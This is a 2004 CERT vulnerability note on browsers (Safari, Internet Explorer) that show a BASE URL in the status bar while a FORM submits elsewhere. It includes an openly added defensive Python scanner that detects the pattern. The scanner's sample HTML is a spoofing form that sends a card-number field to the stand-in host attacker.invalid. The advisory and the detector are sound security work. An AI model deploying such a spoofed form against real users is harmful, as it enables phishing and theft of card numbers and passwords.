CERT Coordination Center

Multiple web browsers do not properly interpret BASE and FORM elements when displaying URLs in the status bar

Vulnerability Note VU#702086

Original Release Date: 2004-11-04 | Last Revised: 2004-11-04

Overview

Multiple web browsers do not properly display the location of HTML documents in the status bar. An attacker could exploit this behavior to mislead users into revealing sensitive information.

Description

Web browsers frequently display the Uniform Resource Locator (URL) in the status bar when a user moves the cursor over links contained within the page. A vulnerability exists in the way multiple web browsers interpret HTML to determine the correct URL to display in the browser's status bar.

The Hypertext Markup Language (HTML) supports the use of the BASE and FORM elements. The BASE element is used to define the base href for the document. For instance, assume that a web developer specifies the following tag in an HTML document:

<base href="http://www.example.com">

If the web developer specifies a link to a document (e.g., index.html) without using a fully qualified URL (e.g., http://www.example.com/index.html), the browser relies on the base href to resolve the complete URL. The FORM element is used to define a section of the document that can contain buttons, text boxes, and labels. When a user completes the form, it can then be submitted. The form's action attribute specifies where the data in the form is sent for processing.

When certain web browsers encounter a BASE element prior to a FORM element, they display the BASE element's URL in the status bar, but submit to the URL specified in the FORM element's action when the user clicks on the link.

Note: In the case of Internet Explorer, exploitation of this vulnerability does not require Active scripting to be enabled.
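The following is an added example, not part of the CERT note, showing how a defender can scan HTML (for instance, inbound mail bodies or hosted pages) for the BASE-before-FORM pattern described above: it records the first BASE href, resolves each later FORM action against it the way a browser would, and flags any form whose real submission host differs from the host a user would have seen in the status bar. The page URL, the sample document, and the hostname attacker.invalid are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class BaseFormAuditor(HTMLParser):
    """Record BASE and FORM elements in document order and flag mismatches.

    For each FORM seen after a BASE, the action is resolved against the base
    href (how a browser completes a relative URL).  The form is reported when
    the host the user would see in the status bar (the BASE URL) differs from
    the host that actually receives the submission (the resolved action).
    """

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url      # used to resolve URLs before any BASE appears
        self.base_href = None
        self.findings = []            # (URL shown in status bar, real submission URL)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and "href" in attrs and self.base_href is None:
            # Browsers honour only the first BASE element in a document.
            self.base_href = urljoin(self.page_url, attrs["href"])
        elif tag == "form" and self.base_href is not None:
            target = urljoin(self.base_href, attrs.get("action", ""))
            if urlsplit(target).netloc != urlsplit(self.base_href).netloc:
                self.findings.append((self.base_href, target))


def audit_html(html, page_url="http://www.example.com/"):
    """Return a list of (status-bar URL, real submission URL) pairs for suspicious forms."""
    auditor = BaseFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample modelled on the pattern in the note: the BASE names a
# trusted site while the FORM submits the entered data somewhere else.
SAMPLE = """<html><head><base href="http://www.example.com"></head>
<body><form action="http://attacker.invalid/collect"><input name="card">
<input type="submit" value="Log in"></form></body></html>"""

if __name__ == "__main__":
    for shown, real in audit_html(SAMPLE):
        print(f"status bar would show {shown} but the form submits to {real}")
```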

Impact

An attacker could mislead a user into believing that the URL shown in the status bar is the site that will be accessed when the user clicks on the link. However, when the user clicks on the link, they will visit a site different from the URL shown in the status bar, potentially one controlled by the attacker. The attacker could use additional social engineering techniques to trick the victim into disclosing sensitive information such as credit card numbers, account numbers, and passwords.

Solution

We are currently unaware of a practical solution to this problem.

Read and send email in plain text format

Outlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view email messages in text format. Consider the security of fellow Internet users and send email in plain text format when possible. Note that reading and sending email in plain text will not necessarily prevent exploitation of this vulnerability.

Vendor Information


Apple Computer Inc. Affected

Updated: November 04, 2004

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does affect Safari 1.2.3 (v125.9).

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Microsoft Corporation Affected

Updated: November 04, 2004

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability affects Internet Explorer 6.0.2900.xpsp2_sp2_rtm.040803-2158.

KDE Desktop Environment Project Unknown

Updated: November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Konqueror version 3.3.

Mozilla Unknown

Updated: November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Mozilla version 1.7.3.

Opera Software Unknown

Updated: November 04, 2004

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

We have verified that this vulnerability does not affect Opera version 7.54.


CVSS Metrics

No base, temporal, or environmental scores are listed for this note.

References

Acknowledgements

This vulnerability was reported by http-equiv.

This document was written by Will Dormann and Damon Morda.

Other Information

CVE IDs: None
Severity Metric: 0.33
Date Public: 2004-11-01
Date First Published: 2004-11-04
Date Last Updated: 2004-11-04 21:53 UTC
Document Revision: 27

Sponsored by CISA.